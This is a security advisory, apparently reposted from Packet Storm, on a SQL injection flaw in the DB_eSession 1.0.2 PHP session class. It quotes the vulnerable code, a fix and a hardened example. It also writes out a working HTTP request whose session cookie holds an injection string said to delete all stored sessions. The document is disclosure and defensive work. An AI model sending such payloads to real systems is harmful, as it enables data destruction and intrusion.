DBeSession102.txt

Published 14 Feb 2006, reported by gulftech.org. Type: packetstorm. Source: packetstormsecurity.com

DB_eSession 1.0.2 SQL Injection vulnerability in PHP class for session data storage

Advisory text (as published on packetstorm):

```
##########################################################
# GulfTech Security Research February 11, 2006
##########################################################
# Vendor : Lawrence Osiris
# URL : http://www.phpclasses.org/browse/package/1624.html
# Version : DB_eSession 1.0.2
# Risk : SQL Injection
##########################################################
```

Description:

DB_eSession is a feature-packed PHP class that stores session data in a MySQL database rather than in files. It is powerful, designed with security in mind, and easy to use. The DB_eSession library is used in a number of popular web applications and private projects alike. DB_eSession is vulnerable to SQL injection because cookie data is used unsafely in an SQL query, which allows an attacker to craft malicious SQL queries and have them executed.

SQL Injection:

There is an SQL injection vulnerability in DB_eSession that allows an attacker to perform pre-authentication SQL injection attacks against the vulnerable web application.

```php
/**
 * Try and save the current session ID if one is defined already.
 */
if (isSet($_COOKIE[$this->_sess_name]))
    $_sess_id_set = $_COOKIE[$this->_sess_name];
else
    if (isSet($GLOBALS[$this->_sess_name]))
        $_sess_id_set = $GLOBALS[$this->_sess_name];
    else
        $_sess_id_set = NULL;
```

The above code is from the DB_eSession class at lines 1080 - 1090. The variable $this->_sess_name is in most cases PHPSESSID, or is set to a developer-specified value. You should be able to tell from having a look at your cookies.

```http
GET /example/index.php HTTP/1.1
Host: example.org
User-Agent: Mozilla/5.0
Accept: text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=143263645564654563456345634563435%00' or 1=1/*
```

The above request would delete all of the sessions in the database. The null byte is there to get past the application dying at line 1134. Depending on the version of MySQL in use, other attacks may be possible. The root of the problem is that unsafe data is taken from a cookie value and passed to the deleteSession() function, where it is used in an SQL query.

Solution:

The vendor was unresponsive to my contact attempts, but a fix is not too difficult: at line 1092, add the following line below the code shown at lines 1080 - 1090.

```php
$_sess_id_set = ( empty($_sess_id_set) ) ? NULL : addslashes($_sess_id_set);
```

This should effectively stop any SQL injection attacks against the vulnerable DB_eSession class.

Related Info:

The original advisory can be found at the following location:
http://www.gulftech.org/?node=research&article_id=00099-02112006
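The following is an added example and not code from DB_eSession or from the advisory. It places the unsafe pattern the advisory describes next to a hardened version: the advisory's addslashes() patch escapes quotes, whereas the version below rejects any cookie value outside the session-ID alphabet and binds the value as a query parameter, so nothing from the cookie is ever parsed as SQL. The table name `sessions`, the column `sess_id` and the function names are assumptions.

```php
<?php
// Added example, not DB_eSession's own code. The table name `sessions`,
// the column `sess_id` and all function names here are assumptions.
declare(strict_types=1);

// Vulnerable pattern described in the advisory: the raw cookie value is
// interpolated into the statement, so a quote inside PHPSESSID changes
// the meaning of the DELETE.
function deleteSessionUnsafe(mysqli $db, string $sessId): void
{
    $db->query("DELETE FROM sessions WHERE sess_id = '$sessId'");
}

// Allow-list check: PHP-generated session IDs only ever contain
// [0-9a-zA-Z,-], so quotes, NUL bytes, spaces and comment markers are
// rejected before they get anywhere near SQL. \z rather than $ so a
// trailing newline cannot slip through.
function isValidSessionId(string $sessId): bool
{
    return preg_match('/^[0-9a-zA-Z,-]{1,128}\z/', $sessId) === 1;
}

// Hardened version: validate first, then bind the value as a parameter so
// the database never parses it as SQL, whatever the MySQL version or
// connection charset. Returns false when the ID is rejected.
function deleteSessionSafe(mysqli $db, string $sessId): bool
{
    if (!isValidSessionId($sessId)) {
        return false;
    }
    $stmt = $db->prepare('DELETE FROM sessions WHERE sess_id = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('s', $sessId);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// At the point where DB_eSession reads the cookie (lines 1080-1090 in the
// advisory): treat an invalid ID as "no session" instead of passing it on.
$sessName  = 'PHPSESSID';
$sessIdSet = $_COOKIE[$sessName] ?? null;
if ($sessIdSet !== null && !isValidSessionId($sessIdSet)) {
    $sessIdSet = null; // start a fresh session; nothing reaches the database
}
```

With this check in place, a cookie value such as the one in the advisory's request is discarded at the entry point, and deleteSession() only ever receives a value that is both well-formed and bound as a parameter.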
